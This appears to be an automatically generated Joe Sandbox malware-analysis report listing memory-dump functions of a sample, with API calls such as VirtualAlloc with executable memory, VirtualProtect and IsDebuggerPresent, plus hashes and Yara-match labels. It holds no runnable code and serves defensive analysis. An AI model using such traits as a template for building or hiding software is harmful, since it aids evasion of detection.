Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 2e603a81dc0d79162a929d27c76b3f5a3df9cc6442bf220cfa2a7392ab76a1e2
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 5A011E70C0425CEAEB11DBD8C5583EEBFB6AF41308F188099C4092B281D7769B58DBA1

Function 00402596 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004025AB

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: d83af5e678f1ea4089bce034330ace12768e6a6437f60fb0112246dd9487f9d1
Instruction ID: d84b4d71a2ca30b2ffd99d73106059b061eb6fdd5c23bf365b4e943021bf88de
Opcode Fuzzy Hash: d83af5e678f1ea4089bce034330ace12768e6a6437f60fb0112246dd9487f9d1
Instruction Fuzzy Hash: 31D05E36554309AEDB009F706C48B633BDCD385395F10443AB81CC6290F6B4C590C64C

Function 004A751D Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00000040,?), ref: 004A7533

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3f34c01d2550e61fb44d90c430b5dfd17a12ef3a284c08f0ace1d646603aa66c
Instruction ID: b6759d83223ea4bba9f524671adf8fe5286732ec4916b71ffc985fda3f1950d1
Opcode Fuzzy Hash: 3f34c01d2550e61fb44d90c430b5dfd17a12ef3a284c08f0ace1d646603aa66c
Instruction Fuzzy Hash: EAC08C71200208BFDB01ABA1FD01E5A3B6DE700244F000130B70AA00B0C2B2E910AB5D

Function 00647485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006474D6

Memory Dump Source

Source File: 0000000A.00000002.2963054220.0000000000647000.00000040.00000020.00020000.00000000.sdmp, Offset: 00647000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_647000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 39fe1aac1669a0deda029ab280bf39b9db7990c7735b483f5bbb6bcf50065c7e
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: DC112B79A00208EFDB01DF98C985E99BBF5AF08351F058094F9489B362D775EA90DF84

Non-executed Functions

Function 00401006 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0040153A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040154F
UnhandledExceptionFilter.KERNEL32(004A81D8), ref: 0040155A
GetCurrentProcess.KERNEL32(C0000409), ref: 00401576
TerminateProcess.KERNEL32(00000000), ref: 0040157D

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 0fb3fb5e7bf259ab6448a8a9e7ebaa3bce846b203ec3679ccc848abcde4aeca9
Instruction ID: 0b3bea1400b40ad5e48ba6736f07bea93129c4e83448c5e6560f8a7e7b25d377
Opcode Fuzzy Hash: 0fb3fb5e7bf259ab6448a8a9e7ebaa3bce846b203ec3679ccc848abcde4aeca9
Instruction Fuzzy Hash: FD21DDB9804200DFD781EF28EC896493FE1FB5A306F50403EE509972B1EBB899848F4D

Function 006470A3 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

5pd, xrefs: 006470A9

Memory Dump Source

Source File: 0000000A.00000002.2963054220.0000000000647000.00000040.00000020.00020000.00000000.sdmp, Offset: 00647000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_647000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID:
String ID: 5pd
API String ID: 0-3087082206
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 4c013d4b22992b1a07084e2b9d967a65dafaba7ed20b7a5fb787b683d92bfcac
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 95118EB2344100AFD754DF55DC81FA673EAEB89720B2980A9ED08CB312D776EC42C7A0

Function 0064871C Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2963054220.0000000000647000.00000040.00000020.00020000.00000000.sdmp, Offset: 00647000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_647000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction ID: f569ca715a50a1eb1d0877dc4b58f9a661e6bbe310bdccbc5abd48377a000560
Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction Fuzzy Hash: 9D3155398062419FCB15CE74D8A0AEDBB72EF87324F6895DCC4818B106D726A04BC794

Function 02000042 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 605dde101be734c256a847c662b73353de139eb0f324a0424a7a5e645f7a2c01
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: F6117C72340200AFFB54DF65DCD0FA673EAEB89320F198165E908CB351D676E801CB60

Function 00401DF1 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 396COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00401DDC
__decode_pointer.LIBCMT ref: 00401F5F
__decode_pointer.LIBCMT ref: 00401F8E
__decode_pointer.LIBCMT ref: 00401FB3
__aulldvrm.LIBCMT ref: 0040211A
_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

-, xrefs: 004021D9
@, xrefs: 00401E7E
, xrefs: 00401E52
g, xrefs: 00401F98

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: __decode_pointer_write_multi_char$_write_string$__aulldvrm__cftof_strlen
String ID: $-$@$g
API String ID: 629750176-2320099971
Opcode ID: 095b86110f62afe62ee8aeefad637a127057675e2d76af2da50f9e5d4e3389cc
Instruction ID: 6ba02f3cd637ff9e87c9cb4f736c74e885d756f073139124003349791a170c4c
Opcode Fuzzy Hash: 095b86110f62afe62ee8aeefad637a127057675e2d76af2da50f9e5d4e3389cc
Instruction Fuzzy Hash: DFF18B7190422D8ADF349A64CD8C7AAB7B4AB14318F1402EBD908B62E1C7BC5EC5CF49

Function 00401FF4 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 354COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00401DDC
__decode_pointer.LIBCMT ref: 00401F5F
__decode_pointer.LIBCMT ref: 00401F8E
__decode_pointer.LIBCMT ref: 00401FB3
__aulldvrm.LIBCMT ref: 0040211A
_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

-, xrefs: 004021D9
', xrefs: 00402005
@, xrefs: 00401C3C
g, xrefs: 00401F98

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: __decode_pointer_write_multi_char$_write_string$__aulldvrm__cftof_strlen
String ID: '$-$@$g
API String ID: 629750176-1341051917
Opcode ID: a8d063c7bea4694a42b0598f3217cd777eb3dfee8eaea566d515b37e24a5fe7c
Instruction ID: 6e2cdd8e9a595e491f7ab82d7812ba42354a33e983998a8c0f01f17afa3f5d1a
Opcode Fuzzy Hash: a8d063c7bea4694a42b0598f3217cd777eb3dfee8eaea566d515b37e24a5fe7c
Instruction Fuzzy Hash: A5E17A7190422D9ADF358A64CD8C7EABBB5AB14314F1402EBD508B62E1CBB85FC5CF49

Function 00402191 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 288COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

-, xrefs: 004021D9
@, xrefs: 00401C3C
g, xrefs: 00401F98

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: _write_multi_char$_write_string$__cftof
String ID: -$@$g
API String ID: 3900997005-2189933660
Opcode ID: 86cdf7e528832d705806c0ab37857f0f317a3912bb5b609c4eb3acbe7be5ac51
Instruction ID: 2d791c561945433e32149f911bfe946a9588dcc2bca4875a51dc65b82c03c0d9
Opcode Fuzzy Hash: 86cdf7e528832d705806c0ab37857f0f317a3912bb5b609c4eb3acbe7be5ac51
Instruction Fuzzy Hash: CBC1687180522D9ADF359A64CD8C7EABBB4AB14314F1001EBD808B62E1CBB85FC5CF49

Function 004021AA Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 285COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

-, xrefs: 004021D9
@, xrefs: 00401C3C
g, xrefs: 00401F98

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: _write_multi_char$_write_string$__cftof
String ID: -$@$g
API String ID: 3900997005-2189933660
Opcode ID: 4d02b72d50c9f9bb1d59fce803be6ecd55bd1512cc6d0135707bc7223e04f134
Instruction ID: b98fa686e20cc06dfa8a849242217f3b7f688326131eda51fcf34a02959cebd9
Opcode Fuzzy Hash: 4d02b72d50c9f9bb1d59fce803be6ecd55bd1512cc6d0135707bc7223e04f134
Instruction Fuzzy Hash: 2FC1687180522D9ADF359A64CD8C7EABBB8AB14314F1401EBD408B62E1CBB95FC5CF49

Function 02026437 Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0202644E

Part of subcall function 02029636: __calloc_impl.LIBCMT ref: 02029645

__calloc_crt.LIBCMT ref: 02026472
_free.LIBCMT ref: 02026480
__calloc_crt.LIBCMT ref: 0202648E
_free.LIBCMT ref: 0202649E
_free.LIBCMT ref: 020264A4
__copytlocinfo_nolock.LIBCMT ref: 020264B3
__setmbcp_nolock.LIBCMT ref: 020264D4
_free.LIBCMT ref: 020264E2
___removelocaleref.LIBCMT ref: 020264E9
___freetlocinfo.LIBCMT ref: 020264F0
_free.LIBCMT ref: 020264F6

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: ff422e637a03db9be988f30755c8b77507f0d30c516445f610cf735809435632
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 1B21A131104730EBEB227F65DC05E9BBBEEDF41B60F60806BE489550A4EB238958FE54

Function 02023F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02023F51

Part of subcall function 02025BA8: __getptd_noexit.LIBCMT ref: 02025BA8

__gmtime64_s.LIBCMT ref: 02023FEA
__gmtime64_s.LIBCMT ref: 02024020
__gmtime64_s.LIBCMT ref: 0202403D
__allrem.LIBCMT ref: 02024093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020240AF
__allrem.LIBCMT ref: 020240C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020240E4
__allrem.LIBCMT ref: 020240FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02024119
__invoke_watson.LIBCMT ref: 0202418A

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: bc4c0a2576b31baab5afb957a88b910d6f82011a917626f5534278f5b07c78ad
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: A2712971A00736ABE715DF79CC80BAAB7FAAF00324F14417BE514E7680E770D9489B90

Function 0202650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 02026547
__calloc_crt.LIBCMT ref: 02026598
__lock.LIBCMT ref: 020265AE
__copytlocinfo_nolock.LIBCMT ref: 020265BF
_wcscmp.LIBCMT ref: 020265F9
__lock.LIBCMT ref: 02026610
__updatetlocinfoEx_nolock.LIBCMT ref: 02026622
___removelocaleref.LIBCMT ref: 02026628
__updatetlocinfoEx_nolock.LIBCMT ref: 02026647

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 37e21b4d0e4c5a70530dc9a12727f348f04cf9a1756f91ee040d6f3f77fa1828
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: 0A411532904328AFDB01AFA4DC84BDE7BEAEF44314F20842BE91496190DB76954CFF65

Function 020284AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 020284B1
_free.LIBCMT ref: 020284E2
_free.LIBCMT ref: 020284F5
_free.LIBCMT ref: 02028513
_free.LIBCMT ref: 02028525
_free.LIBCMT ref: 02028536
_free.LIBCMT ref: 02028541
_free.LIBCMT ref: 02028565
_free.LIBCMT ref: 02028581
_free.LIBCMT ref: 02028597
_free.LIBCMT ref: 020285BF

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID:
API String ID: 1022109855-0
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: d1c07249176f1977871c78b99b96169a83d4203cc28e93b1756ce1ce4d22b6de
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: 2F31A235900770DBCB625F14FC84889B7EEFB14324745C66BE908572A0CBB569CDBEA4

Function 0204FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0204FC1F

Part of subcall function 0203169C: std::exception::_Copy_str.LIBCMT ref: 020316B5

__CxxThrowException@8.LIBCMT ref: 0204FC34
std::exception::exception.LIBCMT ref: 0204FC4D
__CxxThrowException@8.LIBCMT ref: 0204FC62
std::regex_error::regex_error.LIBCPMT ref: 0204FC74

Part of subcall function 0204F914: std::exception::exception.LIBCMT ref: 0204F92E

__CxxThrowException@8.LIBCMT ref: 0204FC82
std::exception::exception.LIBCMT ref: 0204FC9B
__CxxThrowException@8.LIBCMT ref: 0204FCB0

Strings

leM, xrefs: 0204FCA8

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
String ID: leM
API String ID: 3569886845-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: 9751d920df8a6bc28865b9c49a3a7961a7a1b2129bb11102fdfe9a8d13520800
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 4C11B979D0030DBBCF01FFA5D855CEEBBBDAB08344B408566AD1897641EB74A7488F98

Function 0200F010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0200F01F

Part of subcall function 02021602: __FF_MSGBANNER.LIBCMT ref: 02021619
Part of subcall function 02021602: __NMSG_WRITE.LIBCMT ref: 02021620

_malloc.LIBCMT ref: 0200F02B
_wprintf.LIBCMT ref: 0200F03E
_free.LIBCMT ref: 0200F044
_free.LIBCMT ref: 0200F065
_malloc.LIBCMT ref: 0200F06D
_sprintf.LIBCMT ref: 0200F0C0
_wprintf.LIBCMT ref: 0200F0D2
_wprintf.LIBCMT ref: 0200F0DC
_free.LIBCMT ref: 0200F0E5

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: 76815e744d029b49f7304ab8871f9b83f6ad0d981559b30c261202ef3a1e7973
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: 851124B29007706AD272A2F40C15EFF7ADD9F45702F0400ABFE8CD1180EB189A08BBB1

Function 02011960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 020119C6
__CxxThrowException@8.LIBCMT ref: 020119F1
__CxxThrowException@8.LIBCMT ref: 02011A1A
__CxxThrowException@8.LIBCMT ref: 02011A4B
_memset.LIBCMT ref: 02011A6A
__CxxThrowException@8.LIBCMT ref: 02011A90
_malloc.LIBCMT ref: 02011AA0
_memset.LIBCMT ref: 02011AAB
_sprintf.LIBCMT ref: 02011ACE

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2000000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: 457df87ea92b5b1b1369554c6e2b750cc7f70ca817c96b720c16ea5c46d93e05
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: 82513C71D40319ABDB11DBA5DC86FEFBBB9FB04744F100026FA09B6180E7745A059BA5

Function 004A76C9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64sleepCOMMON

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 004A76F9
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 004A7737
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004A773D
OpenJobObjectW.KERNEL32(00000000,00000000,00000000), ref: 004A7746
GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004A7755
Sleep.KERNEL32(00000000), ref: 004A775C

Strings

-, xrefs: 004A7771

Memory Dump Source

Source File: 0000000A.00000002.2962515266.0000000000416000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2962408764.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962515266.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962677020.00000000004A8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962754403.00000000004AB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.2962797227.00000000004BE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_NjdbLPleIutA8FKI_S3fRztd.jbxd

Similarity

API ID: HighestNodeNumaNumber$CalendarInfoNameObjectOpenPathShortSleep
String ID: -
API String ID: 2970987874-2547889144
Opcode ID: 9b33d46c0403a50369798fe00ff57a8df1f0e7e6d27645e2e6df78d4bee4b6d8
Instruction ID: eab8635ab0fcaf2fc8953894b32ace80609d3d51a4a9cbe2f64154a44f6f28a4
Opcode Fuzzy Hash: 9b33d46c0403a50369798fe00ff57a8df1f0e7e6d27645e2e6df78d4bee4b6d8
Instruction Fuzzy Hash: DF2196B5804158EBCB219F25DC849AF7BB8EF86714F0181ADE619A7141CB385DC6CF6C

Function 0200F210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0200F284
__CxxThrowException@8.LIBCMT ref: 0200F2AF
__CxxThrowException@8.LIBCMT ref: 0200F2DE
__CxxThrowException@8.LIBCMT ref: 0200F30F
_memset.LIBCMT ref: 0200F32E
__CxxThrowException@8.LIBCMT ref: 0200F354
_sprintf.LIBCMT ref: 0200F373

Memory Dump Source

Source File: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, Offset: 02000000, based on PE: false

Joe Sandbox IDA Plugin

